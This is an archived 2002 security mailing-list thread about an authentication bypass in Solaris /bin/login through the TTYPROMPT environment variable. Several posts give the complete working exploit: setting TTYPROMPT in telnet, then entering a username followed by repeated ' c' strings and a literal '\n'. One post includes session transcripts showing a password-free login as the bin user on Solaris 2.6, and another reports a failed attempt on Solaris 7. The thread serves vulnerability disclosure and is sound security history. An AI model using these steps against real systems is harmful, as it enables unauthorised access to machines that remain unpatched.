Works like a champ on Solaris 2.6/Sparc: ---------- begin ---------- ~ $ telnet telnet> environ define TTYPROMPT abcdef telnet> o localhost Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. SunOS 5.6 bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n Last login: Thu Oct 3 14:49:33 from localhost Sun Microsystems Inc. SunOS 5.6 Generic August 1997 You have new mail. bin@ovcle$ uname -a SunOS ovcle 5.6 Generic_105181-14 sun4u sparc SUNW,Ultra-4 bin@ovcle$ who am i bin pts/6 Oct 3 15:05 (localhost) ---------- begin ---------- On Wed, 2002-10-02 at 13:23, Ramon Kagan wrote: > Sorry but I can't reproduce this on a Solaris 7 machine. > > sunlight.ccs% telnet > telnet> environ define TTYPROMPT abcdef > telnet> o localhost > Trying 127.0.0.1... > Connected to localhost. > Escape character is '^]'. > > > SunOS 5.7 > > login: bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c > c c c > c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\nPassword: > Login incorrect > > > As you can see I get a request for a username/password. > > Ramon Kagan > York University, Computing and Network Services > Unix Team - Intermediate System Administrator > (416)736-2100 #20263 > rkaganat_private > > ------------------------------------- > I have not failed. I have just > found 10,000 ways that don't work. > - Thomas Edison > ------------------------------------- > > On Wed, 2 Oct 2002, Jonathan S wrote: > > > Hello, > > > > Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the > > environment variable TTYPROMPT. This vulnerability has already been > > reported to BugTraq and a patch has been released by Sun. > > However, a very simple exploit, which does not require any code to be > > compiled by an attacker, exists. The exploit requires the attacker to > > simply define the environment variable TTYPROMPT to a 6 character string, > > inside telnet. I believe this overflows an integer inside login, which > > specifies whether or not the user has been authenticated (just a guess). > > Once connected to the remote host, you must type the username, followed by > > 64 " c"s, and a literal "\n". You will then be logged in as the user > > without any password authentication. This should work with any account > > except root (unless remote root login is allowed). > > > > Example: > > > > coma% telnet > > telnet> environ define TTYPROMPT abcdef > > telnet> o localhost > > > > SunOS 5.8 > > > > bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c > > c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n > > Last login: whenever > > $ whoami > > bin > > > > Jonathan Stuart > > Network Security Engineer > > Computer Consulting Partners, Ltd. > > E-mail: jonsat_private > > > > > -- =================================================== Roy Kidder Data Network Engineer CoreComm --------------------------------------------------- "...these products' frequent failures are legitimized by ubiquitous acquiescence." -- Doc Searls on Microsoft products. ===================================================
This archive was generated by hypermail 2b30 : Thu Oct 03 2002 - 12:33:27 PDT